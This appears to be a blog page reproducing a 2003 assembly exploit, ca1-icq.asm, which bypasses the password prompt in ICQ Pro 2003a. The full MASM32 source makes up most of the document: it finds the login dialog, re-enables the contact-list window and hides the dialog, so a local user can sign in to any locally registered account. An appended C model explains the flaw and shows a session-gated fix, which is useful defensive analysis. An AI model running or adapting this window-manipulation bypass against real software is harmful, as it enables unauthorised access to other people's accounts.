ICQ Pro 2003a Password Bypass exploit (ca1-icq.asm)

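This blog post describes in detail how to exploit a password-bypass vulnerability in ICQ Pro 2003a Build #3800. The author, Caua Moura Prado, shows that running a specific piece of asm code makes it possible to log in to the ICQ server with any locally registered account, whether or not the password was saved, and that it even bypasses the high security setting. The post also notes that ICQ Lite alpha Build 1211, ICQ 2001b and ICQ 2002a are not affected by this vulnerability. The content includes ASM code, written with MASM32, that is used to enable the login window and hide the login screen.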


; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE      BOF
; -------------------------------------------------------------------------
;
;  07/02/2003 - ca1-icq.asm
;  ICQ Password Bypass exploit.
;  written by Caua Moura Prado (aka ca1)
;
;  This exploit allows you to login to ICQ server using any account registered *locally*
;  no matter the 'save password' option is checked or not. High level security is also bypassed.
;  All you have to do is run the exploit and set status property using your mouse when the flower
;  is yellow. If you accidentally set status to offline then you will need to restart ICQ and run
;  the exploit again.
;
;        uh-oh!
;         ___    
;      __/   /__  
;     /  /___/  /        Vulnerable:
;     /__/+ +/__/          ICQ Pro 2003a Build #3800
;     /   ~~~   /
;     /__/   /__/        Not Vulnerable:
;        /___/                ICQ Lite alpha Build 1211
;                               ICQ 2001b and ICQ 2002a
;    tHe Flaw Power       All other versions were not tested.                      
;                                                      
;                         coded with masm32
; ________________________________________________________________exploit born in .br
       
.386
.model flat, stdcall
option casemap:none
include /masm32/include/user32.inc
include /masm32/include/kernel32.inc
includelib /masm32/lib/user32.lib
includelib /masm32/lib/kernel32.lib
.data
szTextHigh byte 'Password Verification', 0
szTextLow byte 'Login to server', 0
szClassName byte '#32770', 0
.data?
hWndLogin dword ?
.code
_entrypoint:
invoke FindWindow, addr szClassName, addr szTextHigh
mov hWndLogin, eax  
.if hWndLogin == 0
  invoke FindWindow, addr szClassName, addr szTextLow
  mov hWndLogin, eax
.endif
invoke GetParent, hWndLogin
invoke EnableWindow, eax, 1     ;Enable ICQ contact list
invoke ShowWindow, hWndLogin, 0 ;get rid of Login screen (don't kill this window)
invoke ExitProcess, 0           ;uhuu.. cya! i gotta sleep!
end _entrypoint

; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE      EOF
; -------------------------------------------------------------------------
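
The listing works because the client treats window state as the login gate: once the contact list accepts input, status changes are honoured. The portable C model below is an added example, not code from the original page or from ICQ, and it puts a handler gated on window state next to one gated on session state. All names and the sample secret are hypothetical and constructed.

```c
#include <stdbool.h>
#include <string.h>

/* Model of a top-level window. Any local process running as the same
   user can change these flags with ordinary window-management calls. */
struct window { bool enabled; bool visible; };

struct client {                    /* hypothetical client state */
    struct window contact_list;    /* disabled while the login dialog is up */
    struct window login_dialog;
    bool session_authenticated;    /* written only by verify_password() */
    const char *stored_secret;     /* constructed sample credential */
    int status;                    /* 0 = offline, 1 = online */
};

void client_init(struct client *c, const char *secret) {
    memset(c, 0, sizeof *c);          /* contact list starts disabled */
    c->login_dialog.visible = true;
    c->stored_secret = secret;
}

/* The only code path allowed to mark the session as authenticated. */
bool verify_password(struct client *c, const char *attempt) {
    c->session_authenticated = (strcmp(attempt, c->stored_secret) == 0);
    if (c->session_authenticated) {
        c->login_dialog.visible = false;
        c->contact_list.enabled = true;
    }
    return c->session_authenticated;
}

/* Weak: "the contact list accepts input" is taken as proof of login. */
bool set_status_ui_gated(struct client *c, int status) {
    if (!c->contact_list.enabled) return false;
    c->status = status;
    return true;
}

/* Hardened: the decision rests on session state that window
   management cannot alter, so flipped UI flags change nothing. */
bool set_status_session_gated(struct client *c, int status) {
    if (!c->session_authenticated) return false;
    c->status = status;
    return true;
}
```

The same rule applies on the server side: a request to go online should be accepted only with proof of the credential, never because the client UI allowed the click.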